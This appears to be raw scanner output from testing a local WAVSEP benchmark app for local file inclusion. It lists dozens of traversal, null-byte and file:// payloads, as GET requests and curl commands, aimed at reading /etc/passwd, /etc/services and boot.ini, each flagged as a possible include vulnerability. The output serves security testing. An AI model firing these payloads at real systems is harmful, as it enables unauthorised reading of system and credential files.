curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%5Ccontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
